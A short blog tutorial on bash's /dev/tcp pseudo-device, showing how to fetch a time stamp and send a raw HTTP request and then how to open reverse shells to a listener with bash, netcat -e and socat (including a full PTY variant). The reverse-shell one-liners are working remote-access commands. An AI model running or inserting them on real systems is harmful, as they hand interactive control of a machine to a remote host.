Reverse shell is a fun
Need a ssh access, but something going wrong? Read on!
Sometimes I need shell right now, but in some cases it's impossible (no ssh on hosting or something like this).
Happily that bash has built-in network pseudo interface (as a default on most distros) /dev/tcp and /dev/udp. So we can use php, ruby, etc on server to create reverse connection to listener and get shell access.
To use it we need redirect output from /dev/tcp to file or something else.
user@host ~ $ cat < /dev/tcp/time.nist.gov/13 57103 15-03-22 23:54:14 50 0 0 587.5 UTC(NIST) *
Send http request:
user@host ~ $ exec 3<> /dev/tcp/roundside.com/80 user@host ~ $ echo -e "GET / HTTP/1.1\nHost: roundside.com\nConnection: close\n\n" >&3 user@host ~ $ cat <&3 HTTP/1.1 200 OK Server: nginx/1.6.1 Date: Mon, 23 Mar 2015 00:06:00 GMT Content-Type: text/html Content-Length: 11517 Connection: close Last-Modified: Tue, 09 Dec 2014 17:40:10 GMT ETag: "6587d2-2cfd-509cc08e7aef5" Accept-Ranges: bytes Vary: Accept-Encoding <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"" ...
A little bit different from previous. As we need to send data first, we need create file descriptor 3 for reading and writing and bind it to /dev/tcp/address/port:
exec 3<> /dev/tcp/roundside.com/80
Beautiful article about redirections is here
Next, create HTTP request header and write it to file descriptor 3 to send it:
echo -e "GET / HTTP/1.1\nHost: roundside.com\nConnection: close\n\n" >&3
And last, read a response.
Now, let's got a bash over tcp
/dev/tcp can only connect to other addresses, so netcat or socat needed on listener. Create a listener:
user@listener ~: nc -l -p 1413
And connect to it from target:
user@target ~ $ /bin/bash -c "/bin/bash -i > /dev/tcp/listener_address/1413 0>&1 2>&1"
Done, now we have remote shell with bash only
user@listener ~: nc -l -p 1413 user@target ~ $
In this example bash in interactive mode
(bash will source ~/.bashrc or default bash config file, so we get a little bit nicer shell) send all it stdout to listener,
/bin/bash -i > /dev/tcp/listener_address/1413
and all what will be send from listener will be executed in bash and redirected back to listener (stderr is also redirected, this is important)
/bin/bash -i > /dev/tcp/listener_address/1413 0>&1 2>&1
/bin/bash -c "bash -i &> /dev/tcp/listener_address/1413 0>&1"
&> or >& will redirect both stderr and stdout to specified address.
Sure, netcat with '-e' parameter can be used to execute bash:
user@target ~ $ nc listener_address 1413 -e '/bin/bash'
But there is some problem.
Key shortcuts, ncurces-based programs will not work correctly. We need more tty access now, and it's a Socat time!
Socat it's like a netcat, but with extremely powerfull features (may be downloaded from here for Linux or here for FreeBSD, both statically linked)
Create a listener:
user@listener ~: socat -,raw,echo=0 tcp-listen:1413
And connect from target:
user@target ~ $ socat tcp:listener_address:1413 exec:"bash -i",pty,stderr,setsid,sigint,sane
Now we can play ninvaders, use htop, mc, vim and any other cli stuff :)
PS: don't forget to adjust terminal size after getting reverse bash.
echo $LINES,$COLUMNS 53,159
and export after got shell:
export LINES=53;export COLUMNS=159
All for now.
Socat man and examples page